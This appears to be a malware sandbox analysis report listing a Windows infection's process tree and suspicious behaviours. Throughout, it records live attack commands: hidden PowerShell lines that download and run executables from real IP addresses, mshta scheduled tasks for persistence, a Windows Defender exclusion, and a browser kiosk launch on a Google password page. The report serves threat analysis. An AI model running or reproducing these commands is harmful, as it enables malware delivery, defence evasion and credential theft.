pid Process 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 1796 rapes.exe 1048 ce4pMzk.exe 1048 ce4pMzk.exe 1048 ce4pMzk.exe 1048 ce4pMzk.exe 1464 powershell.exe 1464 powershell.exe 1464 powershell.exe 2356 TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE 3016 powershell.exe 1612 powershell.exe 2280 powershell.exe 2736 powershell.exe 2736 powershell.exe 2736 powershell.exe 2608 483d2fa8a0d53818306efeb32d3.exe 2968 12d46c5e89.exe 2176 powershell.exe 2588 b29e5d50da.exe 2644 f58873a636.exe 1556 powershell.exe 1556 powershell.exe 1556 powershell.exe 2268 powershell.exe 2644 f58873a636.exe 2644 f58873a636.exe 2644 f58873a636.exe 2644 f58873a636.exe 1304 11eddf214e.exe 2396 ad172f5f1a.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 692 9cd284ebb6.exe 692 9cd284ebb6.exe 692 9cd284ebb6.exe 3340 v6Oqdnc.exe 3664 MCxU5Fj.exe 3664 MCxU5Fj.exe 3664 MCxU5Fj.exe 3664 MCxU5Fj.exe 3836 ce4pMzk.exe 3836 ce4pMzk.exe 3836 ce4pMzk.exe 3836 ce4pMzk.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 1048 ce4pMzk.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 1528 6dac4cad30.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 1360 taskkill.exe Token: SeDebugPrivilege 2292 taskkill.exe Token: SeDebugPrivilege 2516 taskkill.exe Token: SeDebugPrivilege 2624 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 2372 firefox.exe Token: SeDebugPrivilege 2372 firefox.exe Token: SeDebugPrivilege 692 9cd284ebb6.exe Token: SeDebugPrivilege 3836 ce4pMzk.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 2260 5c9465cda4.exe 2260 5c9465cda4.exe 2260 5c9465cda4.exe 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 3000 f590126b2e.exe 3000 f590126b2e.exe 3000 f590126b2e.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2372 firefox.exe 2372 firefox.exe 2372 firefox.exe 2372 firefox.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 2260 5c9465cda4.exe 2260 5c9465cda4.exe 2260 5c9465cda4.exe 3000 f590126b2e.exe 3000 f590126b2e.exe 3000 f590126b2e.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2372 firefox.exe 2372 firefox.exe 2372 firefox.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe 2784 38f8ad48e7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2260 wrote to memory of 1968 2260 5c9465cda4.exe 28 PID 2260 wrote to memory of 1968 2260 5c9465cda4.exe 28 PID 2260 wrote to memory of 1968 2260 5c9465cda4.exe 28 PID 2260 wrote to memory of 1968 2260 5c9465cda4.exe 28 PID 2260 wrote to memory of 2240 2260 5c9465cda4.exe 30 PID 2260 wrote to memory of 2240 2260 5c9465cda4.exe 30 PID 2260 wrote to memory of 2240 2260 5c9465cda4.exe 30 PID 2260 wrote to memory of 2240 2260 5c9465cda4.exe 30 PID 1968 wrote to memory of 2284 1968 cmd.exe 31 PID 1968 wrote to memory of 2284 1968 cmd.exe 31 PID 1968 wrote to memory of 2284 1968 cmd.exe 31 PID 1968 wrote to memory of 2284 1968 cmd.exe 31 PID 2240 wrote to memory of 1664 2240 mshta.exe 32 PID 2240 wrote to memory of 1664 2240 mshta.exe 32 PID 2240 wrote to memory of 1664 2240 mshta.exe 32 PID 2240 wrote to memory of 1664 2240 mshta.exe 32 PID 1664 wrote to memory of 2436 1664 powershell.exe 36 PID 1664 wrote to memory of 2436 1664 powershell.exe 36 PID 1664 wrote to memory of 2436 1664 powershell.exe 36 PID 1664 wrote to memory of 2436 1664 powershell.exe 36 PID 2436 wrote to memory of 1796 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 37 PID 2436 wrote to memory of 1796 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 37 PID 2436 wrote to memory of 1796 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 37 PID 2436 wrote to memory of 1796 2436 TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE 37 PID 1796 wrote to memory of 1048 1796 rapes.exe 39 PID 1796 wrote to memory of 1048 1796 rapes.exe 39 PID 1796 wrote to memory of 1048 1796 rapes.exe 39 PID 1796 wrote to memory of 1048 1796 rapes.exe 39 PID 1796 wrote to memory of 2884 1796 rapes.exe 40 PID 1796 wrote to memory of 2884 1796 rapes.exe 40 PID 1796 wrote to memory of 2884 1796 rapes.exe 40 PID 1796 wrote to memory of 2884 1796 rapes.exe 40 PID 1796 wrote to memory of 3000 1796 rapes.exe 41 PID 1796 wrote to memory of 3000 1796 rapes.exe 41 PID 1796 wrote to memory of 3000 1796 rapes.exe 41 PID 1796 wrote to memory of 3000 1796 rapes.exe 41 PID 3000 wrote to memory of 1124 3000 f590126b2e.exe 42 PID 3000 wrote to memory of 1124 3000 f590126b2e.exe 42 PID 3000 wrote to memory of 1124 3000 f590126b2e.exe 42 PID 3000 wrote to memory of 1124 3000 f590126b2e.exe 42 PID 3000 wrote to memory of 2020 3000 f590126b2e.exe 43 PID 3000 wrote to memory of 2020 3000 f590126b2e.exe 43 PID 3000 wrote to memory of 2020 3000 f590126b2e.exe 43 PID 3000 wrote to memory of 2020 3000 f590126b2e.exe 43 PID 1124 wrote to memory of 2220 1124 cmd.exe 45 PID 1124 wrote to memory of 2220 1124 cmd.exe 45 PID 1124 wrote to memory of 2220 1124 cmd.exe 45 PID 1124 wrote to memory of 2220 1124 cmd.exe 45 PID 2020 wrote to memory of 1464 2020 mshta.exe 46 PID 2020 wrote to memory of 1464 2020 mshta.exe 46 PID 2020 wrote to memory of 1464 2020 mshta.exe 46 PID 2020 wrote to memory of 1464 2020 mshta.exe 46 PID 1796 wrote to memory of 1268 1796 rapes.exe 48 PID 1796 wrote to memory of 1268 1796 rapes.exe 48 PID 1796 wrote to memory of 1268 1796 rapes.exe 48 PID 1796 wrote to memory of 1268 1796 rapes.exe 48 PID 1268 wrote to memory of 828 1268 cmd.exe 50 PID 1268 wrote to memory of 828 1268 cmd.exe 50 PID 1268 wrote to memory of 828 1268 cmd.exe 50 PID 1268 wrote to memory of 828 1268 cmd.exe 50 PID 1464 wrote to memory of 2356 1464 powershell.exe 51 PID 1464 wrote to memory of 2356 1464 powershell.exe 51 PID 1464 wrote to memory of 2356 1464 powershell.exe 51 PID 1464 wrote to memory of 2356 1464 powershell.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5c9465cda4.exe"C:\Users\Admin\AppData\Local\Temp\5c9465cda4.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 7TtQgmaw3g9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\ARG18DPWM.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 7TtQgmaw3g9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\ARG18DPWM.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2284
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\ARG18DPWM.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE"C:\Users\Admin\AppData\Local\TempQUDNOFIJ395CPUAN4M7TKLMCOZOXUZWG.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\MURP0T6t\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10106470101\zY9sqWs.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 10207⤵
- Loads dropped DLL
- Program crash
PID:2644
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106670101\f590126b2e.exe"C:\Users\Admin\AppData\Local\Temp\10106670101\f590126b2e.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ExV1ImalU84 /tr "mshta C:\Users\Admin\AppData\Local\Temp\rlVWQIoZS.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ExV1ImalU84 /tr "mshta C:\Users\Admin\AppData\Local\Temp\rlVWQIoZS.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2220
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\rlVWQIoZS.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Q4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE"C:\Users\Admin\AppData\Local\TempQ4ICL9NOOSUNLZYUKUKHNIKELLEXBM26.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2356
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "sGoDbmanEG2" /tr "mshta \"C:\Temp\svhI53b6p.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2908
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\svhI53b6p.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2608
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106720101\12d46c5e89.exe"C:\Users\Admin\AppData\Local\Temp\10106720101\12d46c5e89.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2968 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:108
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106730101\6dac4cad30.exe"C:\Users\Admin\AppData\Local\Temp\10106730101\6dac4cad30.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\10106730101\6dac4cad30.exe"C:\Users\Admin\AppData\Local\Temp\10106730101\6dac4cad30.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 10128⤵
- Loads dropped DLL
- Program crash
PID:2388
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 5087⤵
- Loads dropped DLL
- Program crash
PID:2068
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106740101\b29e5d50da.exe"C:\Users\Admin\AppData\Local\Temp\10106740101\b29e5d50da.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2588 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1632
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106750101\f58873a636.exe"C:\Users\Admin\AppData\Local\Temp\10106750101\f58873a636.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"6⤵
- Executes dropped EXE
PID:2208 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FB30.tmp\FB31.tmp\FB32.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"7⤵PID:1648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106780101\11eddf214e.exe"C:\Users\Admin\AppData\Local\Temp\10106780101\11eddf214e.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1304 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 12127⤵
- Loads dropped DLL
- Program crash
PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106790101\ad172f5f1a.exe"C:\Users\Admin\AppData\Local\Temp\10106790101\ad172f5f1a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\10106800101\38f8ad48e7.exe"C:\Users\Admin\AppData\Local\Temp\10106800101\38f8ad48e7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2784 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2136
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2372 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.0.1545092195\1334968157" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2fe23d0-d032-4021-ba63-6788db3bbe67} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 1284 121d7f58 gpu9⤵PID:2840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.1.239636886\1544831015" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {065e6a16-9902-4cda-b636-099eb000cbb9} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 1500 d72a58 socket9⤵PID:2928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.2.1971120851\1675006183" -childID 1 -isForBrowser -prefsHandle 2212 -prefMapHandle 2208 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d23e5e41-ea70-4787-9992-9effb73a43a6} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 1936 18fe0e58 tab9⤵PID:2492
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.3.1273999381\377969280" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2892 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {24fe2292-ab2f-4eac-90fe-9e91f9766493} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 2908 1b116b58 tab9⤵PID:2484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.4.1803025147\892740091" -childID 3 -isForBrowser -prefsHandle 3612 -prefMapHandle 3640 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce7caf73-800b-4a44-a7ea-eab27dc2fb29} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 3660 1f667558 tab9⤵PID:2924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.5.1272837408\1153696026" -childID 4 -isForBrowser -prefsHandle 3780 -prefMapHandle 3784 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bafe0439-1472-47ef-a4c2-41e18ad4d368} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 3768 1f669f58 tab9⤵PID:2744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2372.6.914789866\371708281" -childID 5 -isForBrowser -prefsHandle 3944 -prefMapHandle 3948 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab715700-653a-4862-8a1e-a89160c15ab0} 2372 "\\.\pipe\gecko-crash-server-pipe.2372" 3932 1fa2d958 tab9⤵PID:2704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106810101\9cd284ebb6.exe"C:\Users\Admin\AppData\Local\Temp\10106810101\9cd284ebb6.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
